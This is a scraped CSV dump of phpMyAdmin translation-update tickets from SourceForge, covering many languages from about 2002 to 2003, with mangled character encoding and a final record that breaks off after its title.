updates Original URL https sourceforge.net p phpmyadmin translations 255 https sourceforge.net p phpmyadmin translations 255 Original author danone","bug"
"24444","3287","Thai translation quot;compression quot;).
Thai translation amp;quot;compression amp;quot;) Original URL https sourceforge.net p phpmyadmin translations 256 https sourceforge.net p phpmyadmin translations 256 Original author bacteria","bug"
"24444","3288","malay iso 8859 1.inc Update 2.3.3).
malay iso 8859 1.inc Update 2.3.3) Original URL https sourceforge.net p phpmyadmin translations 257 https sourceforge.net p phpmyadmin translations 257 Original author sicksand","bug"
"24444","3289","Spanish update for 2.3.3.
Yet another try.
If upload fails, please update manually Compression = Compresixc3xb3n All the very best, Dr. med.
Daniel Hinostroza C. Original URL https sourceforge.net p phpmyadmin translations 258 https sourceforge.net p phpmyadmin translations 258 Original author anonymous","bug"
"24444","3290","chinese BIG5 and GB translation update.
update Original URL https sourceforge.net p phpmyadmin translations 259 https sourceforge.net p phpmyadmin translations 259 Original author siusun","bug"
"24444","3291","italian updates.
up Original URL https sourceforge.net p phpmyadmin translations 260 https sourceforge.net p phpmyadmin translations 260 Original author danone","bug"
"24444","3292","Estonian language update.
New strings, some fixes Original URL https sourceforge.net p phpmyadmin translations 261 https sourceforge.net p phpmyadmin translations 261 Original author finsoft","bug"
"24444","3293","Swedish translation.
Here is the Swedish translation of the new strings in 2.3.3.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 262 https sourceforge.net p phpmyadmin translations 262 Original author bth","bug"
"24444","3294","Thai update.
th Original URL https sourceforge.net p phpmyadmin translations 263 https sourceforge.net p phpmyadmin translations 263 Original author bacteria","bug"
"24444","3295","Norwegian update based on CVS v2 3 3 pl1).
Here is the updatet translation based on v2 3 3 pl1 from CVS.
Sven Erik Original URL https sourceforge.net p phpmyadmin translations 264 https sourceforge.net p phpmyadmin translations 264 Original author sven erik","bug"
"24444","3296","lithuanian translation windows 1257).
lithuanian translation windows 1257) Original URL https sourceforge.net p phpmyadmin translations 265 https sourceforge.net p phpmyadmin translations 265 Original author viliusz","bug"
"24444","3297","Estonian language update.
New strings for estonian language Original URL https sourceforge.net p phpmyadmin translations 266 https sourceforge.net p phpmyadmin translations 266 Original author finsoft","bug"
"24444","3298","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 267 https sourceforge.net p phpmyadmin translations 267 Original author danone","bug"
"24444","3299","Thai updates.
th Original URL https sourceforge.net p phpmyadmin translations 268 https sourceforge.net p phpmyadmin translations 268 Original author bacteria","bug"
"24444","3300","Norwegian update based on CVS 9. dec.).
Updated Norwegian translation based on CVS norwegian iso 8859 1.inc.php3, v 1.40.
Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 269 https sourceforge.net p phpmyadmin translations 269 Original author sven erik","bug"
"24444","3301","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 270 https sourceforge.net p phpmyadmin translations 270 Original author danone","bug"
"24444","3302","Swedish translation.
Here is the Swedish translation of the new strings.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 271 https sourceforge.net p phpmyadmin translations 271 Original author bth","bug"
"24444","3303","Spanish update.
Hi Marc, strNumTables = Tablas ; strTotalUC = Total ; strRelationalSchema = Esquema relacionado ; strTableOfContents = Tabla de contenido ; All the very best, Dr. med.
Daniel Hinostroza C. dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 272 https sourceforge.net p phpmyadmin translations 272 Original author anonymous","bug"
"24444","3304","Another one Spanish) .
strShowDatadictAs = Formato del Diccionario de Datos ; strLandscape = Orientacixc3xb3n horizontal ; strPortrait = Orientacixc3xb3n vertical ; strCannotLogin = No se consiguixc3xb3 hacer login al servidor MySQL ; All the very best, Dr. med.
Daniel Hinostroza C. dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 273 https sourceforge.net p phpmyadmin translations 273 Original author anonymous","bug"
"24444","3305","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 274 https sourceforge.net p phpmyadmin translations 274 Original author ubanus","bug"
"24444","3306","Catalan update.
Catalan update Original URL https sourceforge.net p phpmyadmin translations 275 https sourceforge.net p phpmyadmin translations 275 Original author xavin","bug"
"24444","3307","Catalan update.
Catalan update Original URL https sourceforge.net p phpmyadmin translations 276 https sourceforge.net p phpmyadmin translations 276 Original author xavin","bug"
"24444","3308","slovenian update.
slovenian update Original URL https sourceforge.net p phpmyadmin translations 277 https sourceforge.net p phpmyadmin translations 277 Original author urosh","bug"
"24444","3309","Norwegian update based on CVS 12. dec.).
Norwegian update based on norwegian iso 8859 1.inc.php3 v 1.44 from CVS from 12. dec Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 278 https sourceforge.net p phpmyadmin translations 278 Original author sven erik","bug"
"24444","3310","Updated slovenian.
Updated slovenian Original URL https sourceforge.net p phpmyadmin translations 279 https sourceforge.net p phpmyadmin translations 279 Original author urosh","bug"
"24444","3311","Correction of Norwegian translation.
The Norwegian translation were full of word splitting errors and some minor spelling errors.
I have corrected I hope) all of those.
I have only corrected the ISO 8859 1 version.
Tore Longva longva stud.ntnu.no Original URL https sourceforge.net p phpmyadmin translations 280 https sourceforge.net p phpmyadmin translations 280 Original author anonymous","bug"
"24444","3312","malay for phpmyadmin 2.3.4. malay for phpmyadmin 2.3.4 Original URL https sourceforge.net p phpmyadmin translations 281 https sourceforge.net p phpmyadmin translations 281 Original author sicksand","bug"
"24444","3313","Estonian language update.
New strings and some fixes in old strings Original URL https sourceforge.net p phpmyadmin translations 282 https sourceforge.net p phpmyadmin translations 282 Original author finsoft","bug"
"24444","3314","lithuanian windows 1257. lithuanian windows 1257 Original URL https sourceforge.net p phpmyadmin translations 283 https sourceforge.net p phpmyadmin translations 283 Original author viliusz","bug"
"24444","3315","Updated and corrected Norwegian trans.
Updated with the corrections from Tore Longva and the new user admin strings.
Have a Merry X mas and a Happy New Year everyone!
Sven Erik Original URL https sourceforge.net p phpmyadmin translations 284 https sourceforge.net p phpmyadmin translations 284 Original author sven erik","bug"
"24444","3316","italian.
updated privileges system Original URL https sourceforge.net p phpmyadmin translations 285 https sourceforge.net p phpmyadmin translations 285 Original author danone","bug"
"24444","3317","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 286 https sourceforge.net p phpmyadmin translations 286 Original author danone","bug"
"24444","3318","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 287 https sourceforge.net p phpmyadmin translations 287 Original author danone","bug"
"24444","3319","Swedish translation.
Here is the Swedish translation of the new strings for 2.3.4.
Happy New Year!
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 288 https sourceforge.net p phpmyadmin translations 288 Original author bth","bug"
"24444","3320","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 289 https sourceforge.net p phpmyadmin translations 289 Original author danone","bug"
"24444","3321","German strOriginalInterface.
Hi there, I don t have access to the CVS tree at the moment, so could someone else commit this update for me?
strOriginalInterface = urspxc3xbcngliche Oberflxc3xa4che ; btw, we did not need this string since server privileges.php3 is meant to replace user details.php3 when it s finished, so the link to uer details.php should disappear before the next release...
Happy New Year 2003, Alexander Original URL https sourceforge.net p phpmyadmin translations 290 https sourceforge.net p phpmyadmin translations 290 Original author rabus","bug"
"24444","3322","Lithuanian translation.
and other major updates on old strings, based on user requirements.
Original URL https sourceforge.net p phpmyadmin translations 291 https sourceforge.net p phpmyadmin translations 291 Original author viliusz","bug"
"24444","3323","Updated indonesian translation.
Here an updated indonesian translation for phpMyAdmin 2.3.3pl1.
Regards, Tamsy Original URL https sourceforge.net p phpmyadmin translations 292 https sourceforge.net p phpmyadmin translations 292 Original author tamsy","bug"
"24444","3324","Norwegian update based on CVS 06. jan.).
Here is an updated Norwegian translation based on the CVS version from january 6.
The file is v 1.54.
Happy New Year everybody!
Sven Erik Original URL https sourceforge.net p phpmyadmin translations 293 https sourceforge.net p phpmyadmin translations 293 Original author sven erik","bug"
"24444","3325","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 295 https sourceforge.net p phpmyadmin translations 295 Original author danone","bug"
"24444","3326","spanish.
Hi, after a long vacation, here are all the pending translations.
Enjoy, Dr. med.
Daniel Hinostroza C. dhinostroza medscape.com Original URL https sourceforge.net p phpmyadmin translations 294 https sourceforge.net p phpmyadmin translations 294 Original author anonymous","bug"
"24444","3327","Catalan update.
Catalan update from the lastest CVS 2003 01 06) Original URL https sourceforge.net p phpmyadmin translations 296 https sourceforge.net p phpmyadmin translations 296 Original author xavin","bug"
"24444","3328","Updated slovenian translation.
Translated new strings and updated previous translations Original URL https sourceforge.net p phpmyadmin translations 297 https sourceforge.net p phpmyadmin translations 297 Original author urosh","bug"
"24444","3329","Norwegian update based on CVS 08. jan.).
Norwegian update based on CVS from 08. jan., file version 1.56.
Sven Erik Original URL https sourceforge.net p phpmyadmin translations 298 https sourceforge.net p phpmyadmin translations 298 Original author sven erik","bug"
"24444","3330","Updated albanian file.
albanian iso 8859 1.inc.php3 Original URL https sourceforge.net p phpmyadmin translations 299 https sourceforge.net p phpmyadmin translations 299 Original author laurenti","bug"
"24444","3331","Catalan update.
Updated the lastest two messages.
Original URL https sourceforge.net p phpmyadmin translations 300 https sourceforge.net p phpmyadmin translations 300 Original author xavin","bug"
"24444","3332","lithuanian.
lithuanian translation for 2.4.0 Original URL https sourceforge.net p phpmyadmin translations 301 https sourceforge.net p phpmyadmin translations 301 Original author viliusz","bug"
"24444","3333","Updated indonesian translation.
Here are the updated indonesian language files as per Jan. 10, 2003 Regards Rachim Original URL https sourceforge.net p phpmyadmin translations 302 https sourceforge.net p phpmyadmin translations 302 Original author tamsy","bug"
"24444","3334","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 303 https sourceforge.net p phpmyadmin translations 303 Original author danone","bug"
"24444","3335","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 304 https sourceforge.net p phpmyadmin translations 304 Original author ubanus","bug"
"24444","3336","slovak translation.
hi, here is slovak translation update iso8859 2).
bye Original URL https sourceforge.net p phpmyadmin translations 305 https sourceforge.net p phpmyadmin translations 305 Original author erkac","bug"
"24444","3337","Swedish translation.
Here is the Swedish translation of the new strings for 2.4.0.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 307 https sourceforge.net p phpmyadmin translations 307 Original author bth","bug"
"24444","3338","Last messages translated from cvs.
Last translations of docSQL messages Original URL https sourceforge.net p phpmyadmin translations 306 https sourceforge.net p phpmyadmin translations 306 Original author xavin","bug"
"24444","3339","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 308 https sourceforge.net p phpmyadmin translations 308 Original author danone","bug"
"24444","3340","Updated slovenian translation.
Updated slovenian translation Original URL https sourceforge.net p phpmyadmin translations 310 https sourceforge.net p phpmyadmin translations 310 Original author urosh","bug"
"24444","3341","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 309 https sourceforge.net p phpmyadmin translations 309 Original author ubanus","bug"
"24444","3342","albanian file.
albanian updated Original URL https sourceforge.net p phpmyadmin translations 311 https sourceforge.net p phpmyadmin translations 311 Original author laurenti","bug"
"24444","3343","slovak translation update.
hi, here is slovak translation update iso8895 2).
please merge it.
thank you, bye.
Original URL https sourceforge.net p phpmyadmin translations 312 https sourceforge.net p phpmyadmin translations 312 Original author erkac","bug"
"24444","3344","Norwegian update based on CVS 29. jan.).
Mainly cosmetic changes, some minor changes in the wording.
Getting it nice and pretty for the next version... ;) Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 313 https sourceforge.net p phpmyadmin translations 313 Original author sven erik","bug"
"24444","3345","Indonesian Update CVS 30 01).
Updated indonesian language files.
Original URL https sourceforge.net p phpmyadmin translations 314 https sourceforge.net p phpmyadmin translations 314 Original author tamsy","bug"
"24444","3346","Updated indonesian translation CVS 02 02 03).
Updated indonesian translation.
Original URL https sourceforge.net p phpmyadmin translations 315 https sourceforge.net p phpmyadmin translations 315 Original author tamsy","bug"
"24444","3347","lithuanian translation.
some improvements from users.
also docSQL strings translation and last translations based on M.Delisle letter.
Original URL https sourceforge.net p phpmyadmin translations 316 https sourceforge.net p phpmyadmin translations 316 Original author viliusz","bug"
"24444","3348","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 317 https sourceforge.net p phpmyadmin translations 317 Original author danone","bug"
"24444","3349","polish.
polish update Original URL https sourceforge.net p phpmyadmin translations 318 https sourceforge.net p phpmyadmin translations 318 Original author anonymous","bug"
"24444","3350","Norwegian update based on CVS 04. feb.).
Norwegian update with the DBG strings based on CVS version from 04. february.
Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 319 https sourceforge.net p phpmyadmin translations 319 Original author sven erik","bug"
"24444","3351","Swedish translation.
Swedish translation of DBG extension messages.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 320 https sourceforge.net p phpmyadmin translations 320 Original author bth","bug"
"24444","3352","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 321 https sourceforge.net p phpmyadmin translations 321 Original author danone","bug"
"24444","3353","Indonesian translation CVS 09 02 03).
Updated indonesian translations as per February 09, 2003\.
Original URL https sourceforge.net p phpmyadmin translations 322 https sourceforge.net p phpmyadmin translations 322 Original author tamsy","bug"
"24444","3354","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 323 https sourceforge.net p phpmyadmin translations 323 Original author danone","bug"
"24444","3355","Pending for 2.4.0 Galician.
strZip = comprimido no formato amp;quot;zip amp;quot; ; strAbsolutePathToDocSqlDir = Introduza a rota absoluta completa ao directorio docSQL no servidor ; strAddedColumnComment = Pxc3xbaxoselle un comentario xc3xa1 columna ; strAddedColumnRelation = Adicionxc3xb3uselle unha relacixc3xb3n xc3xa1 columna ; strFileCouldNotBeRead = Non se puido ler o ficheiro ; strIgnoringFile = A ignorar o ficheiro s ; strImportFiles = Importar ficheiros ; strImportFinished = Finalizou a importacixc3xb3n ; strThisNotDirectory = Isto non era un directorio ; strWritingCommentNotPossible = Non xc3xa9 posible escreber o comentario ; strWritingRelationNotPossible = Non xc3xa9 posible escreber a relacixc3xb3n ; strDefaultValueHelp = Para os valores por omisixc3xb3n, introduza un xc3xbanico valor, sen escapalo con barras ou aspas e usando este formato a ; Original URL https sourceforge.net p phpmyadmin translations 324 https sourceforge.net p phpmyadmin translations 324 Original author xosecalvo","bug"
"24444","3356","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 326 https sourceforge.net p phpmyadmin translations 326 Original author danone","bug"
"24444","3357","Updated indonesian CVS 10 02 03).
Updated indonesian translations as per CVS 10 02 2003 Original URL https sourceforge.net p phpmyadmin translations 325 https sourceforge.net p phpmyadmin translations 325 Original author tamsy","bug"
"24444","3358","Updated Norwegian trans CVS 10.02.03).
Updated Norwegian translation based on CVS version v1.69) february 10.
Translated new strings and htmlized the Norwegian vowels.
Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 327 https sourceforge.net p phpmyadmin translations 327 Original author sven erik","bug"
"24444","3359","Updated slovenian.
updated slovenian Original URL https sourceforge.net p phpmyadmin translations 329 https sourceforge.net p phpmyadmin translations 329 Original author urosh","bug"
"24444","3360","Swedish translation.
Swedish translation of strings for 2.4.0 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 328 https sourceforge.net p phpmyadmin translations 328 Original author bth","bug"
"24444","3361","lithuanian translation.
translated last minute strings Original URL https sourceforge.net p phpmyadmin translations 330 https sourceforge.net p phpmyadmin translations 330 Original author viliusz","bug"
"24444","3362","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 331 https sourceforge.net p phpmyadmin translations 331 Original author ubanus","bug"
"24444","3363","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 332 https sourceforge.net p phpmyadmin translations 332 Original author danone","bug"
"24444","3364","Thai TIS 620.
Thai update for rc2 not all complete) Original URL https sourceforge.net p phpmyadmin translations 333 https sourceforge.net p phpmyadmin translations 333 Original author anonymous","bug"
"24444","3365","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 334 https sourceforge.net p phpmyadmin translations 334 Original author ubanus","bug"
"24444","3366","slovak translation update.
here is updated slovak translation iso 8859 2).
Original URL https sourceforge.net p phpmyadmin translations 335 https sourceforge.net p phpmyadmin translations 335 Original author erkac","bug"
"24444","3367","Swedish translation.
Swedish translation of new strings for 2.4.0.
Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 336 https sourceforge.net p phpmyadmin translations 336 Original author bth","bug"
"24444","3368","e in datefmt.
Can you please change datefmt = e B Y om H M ; to datefmt = d B Y om H M ; in the dutch and eventualy other) translations as e does not work on all PHP server implementations.
Cf.
PHP documentation amp;quot;Not all conversion specifiers may be supported by your C library, in which case they will not be supported by PHP s strftime ).
This means that e.g.
e, T, R and D there might be more) will not work on Windows.
amp;quot; Original URL https sourceforge.net p phpmyadmin translations 337 https sourceforge.net p phpmyadmin translations 337 Original author markdaems","bug"
"24444","3369","Slovak windows 1250).
Hello, there is translated Slovak version with windows 1250 encoding.
Please inform me, how to check for new versions for translate.
Tomas Polak Original URL https sourceforge.net p phpmyadmin translations 338 https sourceforge.net p phpmyadmin translations 338 Original author loskutak","bug"
"24444","3370","updated latvian translation for 2.4.0).
Hi!
This is an updated latvian translation for phpMyAdmin, according to the last 2.4.0 release.
Sorry for the big delay, i have done it already for internal use, just forgot to submit.
Thanks.
Sandis Original URL https sourceforge.net p phpmyadmin translations 339 https sourceforge.net p phpmyadmin translations 339 Original author saaa2002","bug"
"24444","3371","finalized dutch iso 8859 1.inc.php.
strDefaultValueHelp = For default values, please enter just a single value, without backslash escaping or quotes, using this format a ; strCheckPrivs = Check Privileges ; strCheckPrivsLong = Check privileges for database amp;amp;quot; s amp;amp;quot;.
; strDatabasesStatsHeavyTraffic = Note Enabling the Database statistics here might cause heavy traffic between the webserver and the MySQL one.
; strDatabasesStatsDisable = Disable Statistics ; strDatabasesStatsEnable = Enable Statistics ; strJumpToDB = Jump to database amp;amp;quot; s amp;amp;quot;.
; strDropSelectedDatabases = Drop Selected Databases ; strNoDatabasesSelected = No databases selected.
; strDatabasesDropped = s databases have been dropped successfully.
; strGlobal = global ; strDbSpecific = database specific ; strUsersHavingAccessToDb = Users having access to amp;amp;quot; s amp;amp;quot; ; strChangeCopyUser = Change Login Information Copy User ; strChangeCopyMode = Create a new user with the same privileges and ... ; strChangeCopyModeRevoke = ... revoke all active privileges from the old one and delete it afterwards.
; strChangeCopyModeCopy = ... keep the old one.
; strChangeCopyModeJustDelete = ... delete the old one from the user tables.
; strChangeCopyModeDeleteAndReload = ... delete the old one from the user tables and reload the privileges afterwards.
; strWildcard = wildcard ; strDefaultValueHelp = Voer voor standaard waarden aub een enkele waarde in, zonder backslash of aanhalingstekens, gebruik makend van dit formaat a ; strCheckPrivs = Controleer privileges ; strCheckPrivsLong = Controleer privileges voor database amp;amp;quot; s amp;amp;quot;.
; strDatabasesStatsHeavyTraffic = Attentie Indien u hier Database statistieken aanzet kan dit zorgen voor veel data verkeer tussen de webserver en de MySQL server.
; strDatabasesStatsDisable = Statistieken uitzetten ; strDatabasesStatsEnable = Statistieken aanzetten ; strJumpToDB = Ga naar database amp;amp;quot; s amp;amp;quot;.
; strDropSelectedDatabases = Geselecteerde databases verwijderen ; strNoDatabasesSelected = Er is geen databases geselecteerd.
; strDatabasesDropped = s databases zijn succesvol verwijderd.
; strGlobal = globaal ; strDbSpecific = database specifiek ; strUsersHavingAccessToDb = Gebruikers die toegang hebben tot amp;amp;quot; s amp;amp;quot; ; strChangeCopyUser = Wijzig de Login Informatie Kopieer gebruiker ; strChangeCopyMode = Maak een nieuwe gebruiker aan met dezelfde privileges en ... ; strChangeCopyModeCopy = ... behoud de oude.
; strChangeCopyModeJustDelete = ... verwijder de oude van de user tabellen.
; strChangeCopyModeRevoke = ... herstel alle actieve privileges van de oude en verwijder deze daarna.
; strChangeCopyModeDeleteAndReload = ... verwijder de oude van de user tabellen en herlaad de privileges achteraf.
; strWildcard = joker teken ; By Gilles van den Hoven g.vandenhoven chello.nl Original URL https sourceforge.net p phpmyadmin translations 340 https sourceforge.net p phpmyadmin translations 340 Original author anonymous","bug"
"24444","3372","updated Thai.
tis 620 Original URL https sourceforge.net p phpmyadmin translations 341 https sourceforge.net p phpmyadmin translations 341 Original author anonymous","bug"
"24444","3373","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 342 https sourceforge.net p phpmyadmin translations 342 Original author danone","bug"
"24444","3374","Indonesian Update CVS 14 03).
Updated indonesian translations as per CVS 14 03 03 Original URL https sourceforge.net p phpmyadmin translations 343 https sourceforge.net p phpmyadmin translations 343 Original author tamsy","bug"
"24444","3375","lithuanian trans.. lithuanian windows 1257 Original URL https sourceforge.net p phpmyadmin translations 344 https sourceforge.net p phpmyadmin translations 344 Original author viliusz","bug"
"24444","3376","Chinese BIG5 GB Update.
hope will translate the rest next week Original URL https sourceforge.net p phpmyadmin translations 345 https sourceforge.net p phpmyadmin translations 345 Original author siusun","bug"
"24444","3377","Indonesian Update CVS 20 03).
Indonesian Translation as per CVS 20 03 2002 Original URL https sourceforge.net p phpmyadmin translations 346 https sourceforge.net p phpmyadmin translations 346 Original author tamsy","bug"
"24444","3378","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 347 https sourceforge.net p phpmyadmin translations 347 Original author danone","bug"
"24444","3379","Updated slovenian translation.
Updated slovenian translation Original URL https sourceforge.net p phpmyadmin translations 348 https sourceforge.net p phpmyadmin translations 348 Original author urosh","bug"
"24444","3380","lithuanian trans.. lithuanian trans.
Original URL https sourceforge.net p phpmyadmin translations 349 https sourceforge.net p phpmyadmin translations 349 Original author viliusz","bug"
"24444","3381","italian.
latest updates Original URL https sourceforge.net p phpmyadmin translations 350 https sourceforge.net p phpmyadmin translations 350 Original author danone","bug"
"24444","3382","Swedish.
Swedish translation of new strings for 2.5.0 Original URL https sourceforge.net p phpmyadmin translations 351 https sourceforge.net p phpmyadmin translations 351 Original author bth","bug"
"24444","3383","Chinese gb.
Chinese gb and utf 8 encoded.
Original URL https sourceforge.net p phpmyadmin translations 352 https sourceforge.net p phpmyadmin translations 352 Original author fundawang","bug"
"24444","3384","Updated Norwegian translation.
Here is the updated Norwegian translation CVS version 1.92) Sven Erik Andersen Original URL https sourceforge.net p phpmyadmin translations 353 https sourceforge.net p phpmyadmin translations 353 Original author sven erik","bug"
"24444","3385","Indonesian Update CVS 09 04).
Updated indonesian translation per CVS 09 April 2003 Original URL https sourceforge.net p phpmyadmin translations 354 https sourceforge.net p phpmyadmin translations 354 Original author tamsy","bug"
"24444","3386","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 355 https sourceforge.net p phpmyadmin translations 355 Original author danone","bug"
"24444","3387","thai translation.
thai translation Original URL https sourceforge.net p phpmyadmin translations 356 https sourceforge.net p phpmyadmin translations 356 Original author anonymous","bug"
"24444","3388","albanian updated.
albanian iso 8859 1.inc.php3 Original URL https sourceforge.net p phpmyadmin translations 357 https sourceforge.net p phpmyadmin translations 357 Original author laurenti","bug"
"24444","3389","Update spanish lang for phpMyAdmin2.5.0.
I picked the latest version 1.99) from the CVS, translated what was pending.
Here it goes.
All the best, Daniel Original URL https sourceforge.net p phpmyadmin translations 358 https sourceforge.net p phpmyadmin translations 358 Original author dhinostroza","bug"
"24444","3390","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 359 https sourceforge.net p phpmyadmin translations 359 Original author ubanus","bug"
"24444","3391","Updated indonesian translation CVS 13 04 03 ).
Updated indonesian translation CVS 13 04 03 ) Original URL https sourceforge.net p phpmyadmin translations 360 https sourceforge.net p phpmyadmin translations 360 Original author tamsy","bug"
"24444","3392","Swedish.
Swedish translation for 2.5.0, batch 2 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 361 https sourceforge.net p phpmyadmin translations 361 Original author bth","bug"
"24444","3393","italian.
updates Original URL https sourceforge.net p phpmyadmin translations 362 https sourceforge.net p phpmyadmin translations 362 Original author danone","bug"
"24444","3394","thai translation.
thai translation Original URL https sourceforge.net p phpmyadmin translations 363 https sourceforge.net p phpmyadmin translations 363 Original author anonymous","bug"
"24444","3395","Updated Norwegian translation.
Here is an updated norwegian iso 8859 1.inc.php3 based on CVS v 1.95.
Original URL https sourceforge.net p phpmyadmin translations 364 https sourceforge.net p phpmyadmin translations 364 Original author sven erik","bug"
"24444","3396","estonian language update.
big bunch of new translations, some fixes finsoft sourceforge.net Original URL https sourceforge.net p phpmyadmin translations 365 https sourceforge.net p phpmyadmin translations 365 Original author anonymous","bug"
"24444","3397","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 366 https sourceforge.net p phpmyadmin translations 366 Original author ubanus","bug"
"24444","3398","Updated Chinese gb.
Modified according to the lastest in cvs.
Original URL https sourceforge.net p phpmyadmin translations 367 https sourceforge.net p phpmyadmin translations 367 Original author fundawang","bug"
"24444","3399","Latvian translation updated.
Hi, This is an updated latvian translation files, made for the current phpMyAdmin 2.5.0 rc3 dev.
Regards, Sandis Original URL https sourceforge.net p phpmyadmin translations 368 https sourceforge.net p phpmyadmin translations 368 Original author saaa2002","bug"
"24444","3400","Korean translation small update fix).
Some updates for Korean Language.
This file is based on phpMyAdmin 2.5.0 RC2.
And I changed my email from kjh unews.co.kr to kjh unews.NOSPAM.co.kr , because of too much spam and viruses.
Original URL https sourceforge.net p phpmyadmin translations 369 https sourceforge.net p phpmyadmin translations 369 Original author woosuhan","bug"
"24444","3401","Indonesian translation CVS 13 05 03).
Indonesian translation update CVS 13 05 03) Original URL https sourceforge.net p phpmyadmin translations 370 https sourceforge.net p phpmyadmin translations 370 Original author tamsy","bug"
"24444","3402","Updated Norwegian translation.
Here is an updated Norwegian translation based on CVS norwegian iso 8859 1.inc.php3 v1.100.
Sven Erik Original URL https sourceforge.net p phpmyadmin translations 371 https sourceforge.net p phpmyadmin translations 371 Original author sven erik","bug"
"24444","3403","slovak translation.
slovak translation update iso8859 2 Original URL https sourceforge.net p phpmyadmin translations 372 https sourceforge.net p phpmyadmin translations 372 Original author erkac","bug"
"24444","3404","Estonian language update.
New translations Original URL https sourceforge.net p phpmyadmin translations 373 https sourceforge.net p phpmyadmin translations 373 Original author finsoft","bug"
"24444","3405","Updated Bulgarian Translation.
Bulgarian language file version 1.87 100 translated.
Original URL https sourceforge.net p phpmyadmin translations 374 https sourceforge.net p phpmyadmin translations 374 Original author anonymous","bug"
"24444","3406","Updated Bulgarian Translation.
Bulgarian language file version 1.87 100 translated.
Original URL https sourceforge.net p phpmyadmin translations 375 https sourceforge.net p phpmyadmin translations 375 Original author stanprog","bug"
"24444","3407","Norwegian update based on CVS 21. may).
Added the translated strings strInsertedRowId strNoPermission strNoSpace Sven Erik Original URL https sourceforge.net p phpmyadmin translations 376 https sourceforge.net p phpmyadmin translations 376 Original author sven erik","bug"
"24444","3408","Indonesian translation CVS 21 05 03).
Updated indonesian translations CVS 21 05 03) Original URL https sourceforge.net p phpmyadmin translations 377 https sourceforge.net p phpmyadmin translations 377 Original author tamsy","bug"
"24444","3409","Swedish.
Swedish translation for 2.5.1 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 378 https sourceforge.net p phpmyadmin translations 378 Original author bth","bug"
"24444","3410","updated russian cp 1251.
Eugene Berdnichenko berdni osp.ru) sent valuable corrections to the existing translation.
Artyom.
Original URL https sourceforge.net p phpmyadmin translations 379 https sourceforge.net p phpmyadmin translations 379 Original author tyomych","bug"
"24444","3411","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 380 https sourceforge.net p phpmyadmin translations 380 Original author ubanus","bug"
"24444","3412","Chinese BIG5 Update.
I have translated most.. Those rest will translate soon ps someone have already translated Chinese GB version because I am too lazy to update translate) and have better translation than me I am not live in China) .
So I will focus on BIG5 in the future.
ps2 in strFileNameTemplateHelp , there is a typing mistake in the word amp;quot;automatically amp;quot;.
automagically) Original URL https sourceforge.net p phpmyadmin translations 382 https sourceforge.net p phpmyadmin translations 382 Original author siusun","bug"
"24444","3413","italian updates.
bye Pietro Original URL https sourceforge.net p phpmyadmin translations 381 https sourceforge.net p phpmyadmin translations 381 Original author danone","bug"
"24444","3414","Updated Chinese gb.
Updated chinese gb and chinese gb utf 8 Original URL https sourceforge.net p phpmyadmin translations 383 https sourceforge.net p phpmyadmin translations 383 Original author fundawang","bug"
"24444","3415","Swedish.
Swedish translation of new strings for 2.5.1 Bjxc3xb6rn Original URL https sourceforge.net p phpmyadmin translations 384 https sourceforge.net p phpmyadmin translations 384 Original author bth","bug"
"24444","3416","Catalan update.
Catalan update from the last CVS file Original URL https sourceforge.net p phpmyadmin translations 385 https sourceforge.net p phpmyadmin translations 385 Original author xavin","bug"
"24444","3417","polish update.
polish update Original URL https sourceforge.net p phpmyadmin translations 386 https sourceforge.net p phpmyadmin translations 386 Original author ubanus","bug"
"24444","3418","lithuanian trans.. .lt translation Original URL https sourceforge.net p phpmyadmin translations 387 https sourceforge.net p phpmyadmin translations 387 Original author viliusz","bug"
"24444","3419","Updated Chinese gb and utf 8. strLoad Original URL https sourceforge.net p phpmyadmin translations 388 https sourceforge.net p phpmyadmin translations 388 Original author fundawang","bug"
"24444","3420","slovak translation update.
hi, here is slovak translation update iso 8859 2).
bye Original URL https sourceforge.net p phpmyadmin translations 389 https sourceforge.net p phpmyadmin translations 389 Original author erkac","bug"
"24444","3421","Little bug in Polish translation.
